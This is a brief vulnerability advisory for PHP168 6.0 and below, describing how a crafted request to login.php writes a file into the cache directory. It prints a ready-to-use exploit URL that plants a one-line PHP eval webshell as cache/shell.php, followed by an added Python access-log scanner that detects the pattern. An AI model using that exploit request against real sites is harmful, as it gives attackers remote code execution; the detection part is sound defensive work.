Danger level: high
//Looks like this is becoming more and more public.
Affected versions: PHP168 6.0 and below
An intruder can send a specially constructed request to the user login page that writes a one-line PHP statement into the cache directory, thereby obtaining webshell access to a website running the PHP168 whole-site program.
Affected file: login.php
login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>
Written to: cache/shell.php
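
Detection: the request above leaves a recognisable trace in web-server access logs (login.php called with makehtml, a chdb[htmlname] ending in a script extension, and a content value carrying a PHP open tag). The following is an added example, not part of the original advisory or of PHP168; the access-log format, the sample lines and the list of script extensions are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines; addresses, paths and values are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /login.php HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /login.php?makehtml=1&chdb[htmlname]=index.htm&chdb[path]=cache HTTP/1.1" 200 312
203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /login.php?makehtml=1&chdb%5Bhtmlname%5D=x.php&chdb%5Bpath%5D=cache&content=%3C%3Fphp%20PLACEHOLDER%3B%3F%3E HTTP/1.1" 200 12
203.0.113.9 - - [01/Jan/2024:10:02:15 +0000] "GET /member/LOGIN.PHP?makehtml=1&chdb%255Bhtmlname%255D=y.PhP&content=a HTTP/1.1" 200 12
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar)$", re.I)  # assumed extension list
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (conservative: also catches %255B)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def inspect_request(target):
    """Return the reasons a request target matches the login.php cache-write pattern."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/login.php"):
        return []
    # parse_qs decodes once; a second pass normalises re-encoded names and values.
    params = {fully_unquote(k): [fully_unquote(v) for v in vs]
              for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    if "makehtml" not in params:
        return []
    reasons = []
    for name in params.get("chdb[htmlname]", []):
        if SCRIPT_EXT.search(name.strip()):
            reasons.append(f"htmlname has script extension: {name}")
    for body in params.get("content", []):
        if PHP_TAG.search(body):
            reasons.append("content contains a PHP open tag")
    return reasons

def scan(log_text):
    """Return (line_number, reasons) for each suspicious log line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST.search(line)
        reasons = inspect_request(match.group("target")) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits
```

Parameters sent in a POST body do not appear in access logs, so a clean scan should be paired with a check for unexpected script files in the cache directory.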